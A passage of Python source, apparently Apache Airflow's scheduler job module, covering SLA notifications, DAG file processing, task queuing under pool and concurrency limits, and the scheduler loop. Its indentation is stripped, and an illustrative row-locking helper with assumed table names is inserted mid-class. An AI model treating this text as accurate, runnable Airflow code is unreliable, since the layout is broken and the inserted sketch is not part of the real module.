f"[airflow] SLA miss on DAG={dag.dag_id}",
email_content
)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
@provide_session
def execute_callbacks(
self,
dagbag: DagBag,
callback_requests: List[CallbackRequest],
session: Session = None
) -> None:
"""
Execute the on-failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.dags.get(request.dag_id))
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception: # pylint: disable=broad-except
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
dag.handle_callback(
dagrun=dag_run,
success=not request.is_failure_callback,
reason=request.msg,
session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
if request.is_failure_callback:
ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns the number of DAGs found in the file and the count of
import errors.
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.read_dags_from_db = True
# Retry 'dagbag.sync_to_db()' in case of any Operational Errors
# In case of failures, provide_session handles rollback
for attempt in tenacity.Retrying(
retry=tenacity.retry_if_exception_type(exception_types=OperationalError),
wait=tenacity.wait_random_exponential(multiplier=0.5, max=5),
stop=tenacity.stop_after_attempt(settings.MAX_DB_RETRIES),
before_sleep=tenacity.before_sleep_log(self.log, logging.DEBUG),
reraise=True
):
with attempt:
self.log.debug(
"Running dagbag.sync_to_db with retries. Try %d of %d",
attempt.retry_state.attempt_number,
settings.MAX_DB_RETRIES
)
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: Any = None,
*args, **kwargs):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and isn't something a user is likely to want to
# configure -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(read_dags_from_db=True)
def register_exit_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self,
old_states: List[str],
new_state: str,
session: Session = None
) -> None:
"""
For all DAG IDs in the DagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.TaskInstance.dag_run) \
.filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids))) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None))) # pylint: disable=no-member
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = with_row_locks(query, of=TI,
**skip_locked(session=session)).all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
current_time = timezone.utcnow()
ti_prop_update = {
models.TaskInstance.state: new_state,
models.TaskInstance.start_date: current_time,
}
# Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
if new_state in State.finished:
ti_prop_update.update({
models.TaskInstance.end_date: current_time,
models.TaskInstance.duration: 0,
})
tis_changed = session \
.query(models.TaskInstance) \
.filter(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date) \
.update(ti_prop_update, synchronize_session=False)
session.flush()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from dag_id to # of task instances in the given states and
a map from (dag_id, task_id) to # of task instances in the given states
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param max_tis: Maximum number of TIs to queue in this loop.
:type max_tis: int
:return: list[airflow.models.TaskInstance]
"""
executable_tis: List[TI] = []
# Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
# Throws an exception if lock cannot be obtained, rather than blocking
pools = models.Pool.slots_stats(lock_rows=True, session=session)
# If the pools are full, there is no point doing anything!
# If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))
if pool_slots_free == 0:
self.log.debug("All pools are full!")
return executable_tis
max_tis = min(max_tis, pool_slots_free)
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
query = (
session
.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None),
DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model'))
.limit(max_tis)
)
task_instances_to_examine: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
# TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
# Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
pool_to_task_instances: DefaultDict[str, List[models.Pool]] = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map: DefaultDict[str, int]
task_concurrency_map: DefaultDict[Tuple[str, str], int]
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
open_slots = pools[pool]["open"]
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = task_instance.dag_model.concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit: Optional[int] = None
if task_instance.dag_model.has_task_concurrency_limits:
# Many dags don't have a task_concurrency, so the more we can avoid loading the full
# serialized DAG, the better.
serialized_dag = self.dagbag.get_dag(dag_id, session=session)
if serialized_dag.has_task(task_instance.task_id):
task_concurrency_limit = serialized_dag.get_task(
task_instance.task_id).task_concurrency
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if task_instance.pool_slots > open_slots:
self.log.info("Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance, task_instance.pool_slots, open_slots, pool)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(executable_tis)
session.query(TI).filter(filter_for_tis).update(
# TODO[ha]: should we use func.now()? How does that work with DB timezone on mysql when it's not
# UTC?
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
synchronize_session=False
)
for ti in executable_tis:
make_transient(ti)
return executable_tis
def _enqueue_task_instances_with_queued_state(
self,
task_instances: List[TI]
) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
ti.key, priority, queue
)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
HA note: This function is a "critical section" meaning that only a single executor process can execute
this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
new DAG runs, progressing TIs from None to SCHEDULED etc.); on DBs that don't support this (such as
MariaDB or MySQL 5.x), the other schedulers will wait for the lock before continuing.
:param session:
:type session: sqlalchemy.orm.Session
:return: Number of task instances with state changed.
"""
max_tis = min(self.max_tis_per_query, self.executor.slots_available)
queued_tis = self._executable_task_instances_to_queued(max_tis, session=session)
self._enqueue_task_instances_with_queued_state(queued_tis)
return len(queued_tis)
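# A minimal, hedged sketch of the row-locking pattern the docstring above
# describes, written with plain SQLAlchemy. The table/column names and the
# helper name are illustrative assumptions, not Airflow's real schema or API.
def _pool_lock_sketch(engine):
    """Lock pool rows with SKIP LOCKED so a second scheduler skips ahead instead of blocking."""
    from sqlalchemy import text  # local import: example only
    with engine.begin() as conn:
        rows = conn.execute(
            text("SELECT pool, slots FROM slot_pool FOR UPDATE SKIP LOCKED")
        ).fetchall()
        # ... queue task instances against the locked rows; the lock is released on commit ...
        return rows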
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if not self.executor.queued_tasks:
return
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# TI.try_number returns the raw try_number + 1 while the TI is not
# running, so we subtract 1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query).all()
if not tis_to_set_to_scheduled:
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(repr(x) for x in tis_to_set_to_scheduled)
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, session: Session = None) -> int:
"""Respond to executor events."""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
ti_primary_key_to_try_number_map: Dict[Tuple[str, str, datetime.datetime], int] = {}
event_buffer = self.executor.get_event_buffer()
tis_with_right_state: List[TaskInstanceKey] = []
# Report execution
for ti_key, value in event_buffer.items():
state: str
state, _ = value
# We create map (dag_id, task_id, execution_date) -> in-memory try_number
ti_primary_key_to_try_number_map[ti_key.primary] = ti_key.try_number
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
ti_key.dag_id, ti_key.task_id, ti_key.execution_date, state, ti_key.try_number
)
if state in (State.FAILED, State.SUCCESS, State.QUEUED):
tis_with_right_state.append(ti_key)
# Return if no finished tasks
if not tis_with_right_state:
return len(event_buffer)
# Check state of finished tasks
filter_for_tis = TI.filter_for_tis(tis_with_right_state)
tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = "Executor reports task instance %s finished (%s) although the " \
"task says its %s. (Info: %s) Was the task killed externally?"
self.log.error(msg, ti, state, ti.state, info)
request = TaskCallbackRequest(
full_filepath=ti.dag_model.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg=msg % (ti, state, ti.state, info),
)
self.processor_agent.send_callback_to_execute(request)
return len(event_buffer)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_times_parse_dags)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_times_parse_dags,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=[],
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.adopt_or_reset_orphaned_tasks()
self.register_exit_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
callback_requests: List[CallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool
) -> DagFileProcessorProcess:
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_ids=dag_ids,
callback_requests=callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
for loop_count in itertools.count(start=1):
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
with create_session() as session:
num_queued_tis = self._do_scheduling(session)
self.executor.heartbeat()
session.expunge_all()
num_finished_events = self._process_executor_events(session=session)
self.processor_agent.heartbeat()
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
self._emit_pool_metrics()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug("Ran scheduling loop in %.2f seconds", loop_duration)
if not is_unit_test and not num_queued_tis and not num_finished_events:
# If the scheduler is doing things, don't sleep. This means when there is work to do, the
# scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU
# usage when "idle"
time.sleep(self._processor_poll_interval)
if loop_count >= self.num_runs > 0:
self.log.info(
"Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
self.num_runs, loop_count,
)
break
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d "
" scheduler loops",
self.num_times_parse_dags, loop_count,
)
break
def _do_scheduling(self, session) -> int:
"""
This function is where the main scheduling decisions take places. It:
- Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel
Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
(configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
scheduling tasks.
- Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)
By "next oldest", we mean hasn't been examined/scheduled in the most time.
The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
that only one scheduler can "process them", even it it is waiting behind other dags. Increasing this
limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
(>500 tasks.) DAGs
- Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
to the executor.
See docs of _critical_section_execute_task_instances for more.
:return: Number of TIs enqueued in this iteration
:rtype: int
"""
# Put a check in place to make sure we don't commit unexpectedly
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
query = DagModel.dags_needing_dagruns(session)
self._create_dag_runs(query.all(), session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagruns
dag_runs = DagRun.next_dagruns_to_examine(session)
# Bulk fetch the currently active dag runs for the dags we are
# examining, rather than making one query per DagRun
# TODO: This query is probably horribly inefficient (though there is an
# index on (dag_id,state)). It is to deal with the case when a user
# clears more than max_active_runs older tasks -- we don't want the
# scheduler to suddenly go and start running tasks from all of the
# runs. (AIRFLOW-137/GH #1442)
#
# The longer term fix would be to have `clear` do this, and put DagRuns
# in to the queued state, then take DRs out of queued before creating
# any new ones
# TODO[HA]: Why is this on TI, not on DagRun??
currently_active_runs = dict(session.query(
TI.dag_id,
func.count(TI.execution_date.distinct()),
).filter(
TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
TI.state.notin_(list(State.finished))
).group_by(TI.dag_id).all())
for dag_run in dag_runs:
self._schedule_dag_run(dag_run, currently_active_runs.get(dag_run.dag_id, 0), session)
guard.commit()
# Without this, the session has an invalid view of the DB
session.expunge_all()
# END: schedule TIs
# TODO[HA]: Do we need to do it every time?
try:
self._change_state_for_tis_without_dagrun(
old_states=[State.UP_FOR_RETRY],
new_state=State.FAILED,
session=session
)
self._change_state_for_tis_without_dagrun(
old_states=[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE,
State.SENSING],
new_state=State.NONE,
session=session
)
guard.commit()
except OperationalError as e:
if is_lock_not_available_error(error=e):
self.log.debug("Lock held by another Scheduler")
session.rollback()
else:
raise
try:
if self.executor.slots_available <= 0:
# We know we can't do anything here, so don't even try!
self.log.debug("Executor full, skipping critical section")
return 0
timer = Stats.timer('scheduler.critical_section_duration')
timer.start()
# Find anything TIs in state SCHEDULED, try to QUEUE it (send it to the executor)
num_queued_tis = self._critical_section_execute_task_instances(session=session)
# Make sure we only send this metric if we obtained the lock, otherwise we'll skew the
# metric way down.
timer.stop(send=True)
except OperationalError as e:
timer.stop(send=False)
if is_lock_not_available_error(error=e):
self.log.debug("Critical section lock held by another Scheduler")
Stats.incr('scheduler.critical_section_busy')
session.rollback()
return 0
raise
return num_queued_tis
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
for dag_model in dag_models:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=dag_model.next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
self._update_dag_next_dagruns(dag_models, session)
# TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
# memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
# Check max_active_runs, to see if we are _now_ at the limit for any of
# these dags (we've just created a DagRun for them, after all).
active_runs_of_dags = dict(session.query(DagRun.dag_id, func.count('*')).filter(
